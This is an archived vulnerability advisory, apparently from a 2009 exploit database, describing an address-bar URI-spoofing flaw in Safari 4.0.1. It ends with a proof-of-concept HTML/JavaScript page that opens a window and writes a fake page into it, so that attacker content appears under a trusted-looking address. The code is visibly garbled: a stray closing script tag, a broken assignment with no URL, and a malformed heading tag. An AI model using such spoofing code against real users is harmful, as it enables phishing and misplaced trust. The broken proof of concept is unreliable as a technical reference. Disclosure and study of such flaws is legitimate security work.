Apple Safari 4.0.1 - Error Page Address Bar URI Spoofing

Vulnerability ID: 1057940 | Vulnerability type:
Published: 2009-06-27 | Updated: 2009-06-27
Platform: Multiple | CVSS score: N/A

Apple Safari is affected by a URI-spoofing vulnerability.

An attacker may leverage this issue by inserting arbitrary content to spoof a URI presented to an unsuspecting user. This may lead to a false sense of trust because the victim may be presented with a URI of a seemingly trusted site while interacting with the attacker's malicious site.

Safari 4.0.1 is affected; other versions may also be vulnerable.

This issue is similar to the vulnerability discussed in BID 35803 (Mozilla Firefox Error Page Address Bar URI Spoofing Vulnerability). 

</script>
<center> <h1>Firefox spoofing</h1> </center>
<p> <a href="javascript:spoof()">test!</a> <p>
<script>
function spoof() {
  a =",")
  a.document.write("<H1>FAKE PAGE<\h1>")
  a.document.write("<title>test</title>")
  a.stop ();
}
</script>
<br>
Juan Pablo Lopez Yacubian